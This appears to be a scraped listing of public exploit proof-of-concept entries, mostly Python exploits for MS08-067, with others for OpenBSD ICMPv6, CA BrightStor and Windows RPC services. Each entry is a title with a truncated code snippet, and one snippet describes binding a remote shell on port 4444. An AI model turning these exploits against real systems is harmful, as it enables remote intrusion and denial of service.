OpenBSD - ICMPv6 Fragment Remote Execution Exploit PoC

No description provided by source. The PoC executes the shellcode int 3 and returns. It overwrites the extfree function pointer on the mbuf and forces a mfreem on the overflowed packet. The Impacket library is used to craft and send packets http://oss.coresecurity.com/projects/impacket.html or...

MS Windows Server Service - Code Execution Exploit (MS08-067)

No description provided by source. !/usr/bin/env python Ms08067 exploit by Oopohh 这个exploit的payload我只写了windows xp sp2版本的,其他像是2000 ,2003 ,xp sp3 的版本只能触发程序崩溃．另外这个远程exploit可以执行关机命令． 需要安装python库impacket from impacket.dcerpc import transport,dcerpc from impacket import uuid shellcode = '' shellcode +=...

Python tools for Pentesters

If you are involved in vulnerability research, reverse engineering or penetration testing, I suggest to try out the Python programming language. It has a rich set of useful libraries and programs. This page lists some of them. Most of the listed tools are written in Python, others are just Python...

[SET v5.1] The Social-Engineer Toolkit codename “Name of the Doctor”

The Social-Engineer Toolkit SET version 5.1 codename “ Name of the Doctor ” has been released. This version adds a complete rewrite of the MSSQL Bruter as well as a new attack vector utilizing the PSExec functionality within Metasploit. The MSSQL Bruter now incorporates UDP port 1434 quick...

Windows ms08-067 缓冲区溢出漏洞

No description provided by source. !/usr/bin/env python coding=utf-8 import struct import sys import socket from threading import Thread Thread is imported incase you would like to modify the src to run against multiple targets from urlparse import urlparse try: from impacket import smb from...

MS Windows Server Service Code Execution Exploit (MS08-0 6 7) (2k/2k3)-the exploit-warning-the black bar safety net

!/ usr/bin/env python MS08-0 6 7 Exploit by Debasis Mohanty aka Tr0y/nopsled www.hackingspirits.com www.coffeeandsecurity.com Email: d3basis. m0hanty @ gmail.com import struct import sys from threading import Thread Thread is imported incase you would like to modify the src to run against multipl...

MS Windows Server Service Code Execution Exploit (MS08-067) (2k/2k3)

No description provided by source. !/usr/bin/env python MS08-067 Exploit by Debasis Mohanty aka Tr0y/nopsled www.hackingspirits.com www.coffeeandsecurity.com Email: d3basis.m0hanty @ gmail.com import struct import sys from threading import Thread Thread is imported incase you would like to modify...

MS Windows Server Service Code Execution Exploit (MS08-067) (2k/2k3)

Exploit for unknown platform in category remote exploits ==================================================================== MS Windows Server Service Code Execution Exploit MS08-067 2k/2k3 ==================================================================== !/usr/bin/env python MS08-067 Exploit...

ms08067-2k2k3.txt

!/usr/bin/env python MS08-067 Exploit by Debasis Mohanty aka Tr0y/nopsled www.hackingspirits.com www.coffeeandsecurity.com Email: d3basis.m0hanty @ gmail.com import struct import sys from threading import Thread Thread is imported incase you would like to modify the src to run against multiple...

Microsoft Windows Server 20002003 - Code Execution (MS08-067)

Microsoft Windows Server 20002003 - Code Execution MS08-067 !/usr/bin/env python MS08-067 Exploit by Debasis Mohanty aka Tr0y/nopsled www.hackingspirits.com www.coffeeandsecurity.com Email: d3basis.m0hanty @ gmail.com E-DB Note: Exploit Update...

Microsoft Windows Server 2000 SP4 - DNS RPC Remote Buffer Overflow

!/usr/bin/python Remote exploit for the 0day Windows DNS RPC service vulnerability as described in https://www.securityfocus.com/bid/23470/info. Tested on Windows 2000 SP4. The exploit if successful binds a shell to TCP port 4444 and then connects to it. Cheers to metasploit for the first exploit...

caid-msgeng.txt

!/usr/bin/python This one was listed in the SANS TOP 20 and I needed an exploit for analysis. I couldnt find a reliable exploit for my analysis and so came up with this. Remote exploit for the CA BrightStor msgeng.exe service stack overflow vulnerability as described in LS-20060330.pdf on...

CA BrightStor ARCserve (msgeng.exe) Remote Stack Overflow Exploit

Exploit for unknown platform in category remote exploits ================================================================= CA BrightStor ARCserve msgeng.exe Remote Stack Overflow Exploit ================================================================= !/usr/bin/python This one was listed in the...

OpenBSD ICMPv6 Fragment Remote Execution Exploit PoC

No description provided by source. The PoC executes the shellcode int 3 and returns. It overwrites the extfree function pointer on the mbuf and forces a mfreem on the overflowed packet. The Impacket library is used to craft and send packets http://oss.coresecurity.com/projects/impacket.html or...

OpenBSD - ICMPv6 Fragment Remote Execution

The PoC executes the shellcode int 3 and returns. It overwrites the extfree function pointer on the mbuf and forces a mfreem on the overflowed packet. The Impacket library is used to craft and send packets http://oss.coresecurity.com/projects/impacket.html or download from Debian repositories...

Microsoft Windows - DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption

Microsoft Windows - DCE-RPC svcctl ChangeServiceConfig2A Memory Corruption !/usr/bin/python MS Windows DCE-RPC svcctl ChangeServiceConfig2A 0day Memory Corruption PoC Exploit Bug discovered by Krystian Kloskowski h07 Tested on Windows 2000 SP4 Polish all patches Requires.. - Impacket :...

Microsoft Windows - DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption

!/usr/bin/python MS Windows DCE-RPC svcctl ChangeServiceConfig2A 0day Memory Corruption PoC Exploit Bug discovered by Krystian Kloskowski h07 Tested on Windows 2000 SP4 Polish all patches Requires.. - Impacket : http://oss.coresecurity.com/projects/impacket.html - PyCrypto :...

CA BrightStor ARCserve (msgeng.exe) Remote Heap Overflow Exploit

Exploit for unknown platform in category remote exploits ================================================================ CA BrightStor ARCserve msgeng.exe Remote Heap Overflow Exploit ================================================================ !/usr/bin/python I couldnt find a reliable...

Microsoft Windows - 'NetrWkstaUserEnum()' Remote Denial of Service

!/usr/bin/python MS Windows Workstation Service NetrWkstaUserEnum 0day Memory Allocation Remote DoS Exploit Bug discovered by h07 Tested on:.. - Windows XP SP2 Polish - Windows 2000 SP4 Polish + All Microsoft Security Bulletins Example: wksdos.py 192.168.0.2 512 MS Windows NetrWkstaUserEnum 0day...

Microsoft Windows - spoolss GetPrinterData() Remote Denial of Service

Microsoft Windows - spoolss GetPrinterData Remote Denial of Service !/usr/bin/python MS Windows spoolss GetPrinterData 0day Memory Allocation Remote DoS Exploit Bug discovered by h07 Tested on Windows 2000 SP4 Polish + All Microsoft Security Bulletins Example: C:\python spoolssdos.py 192.168.0.2...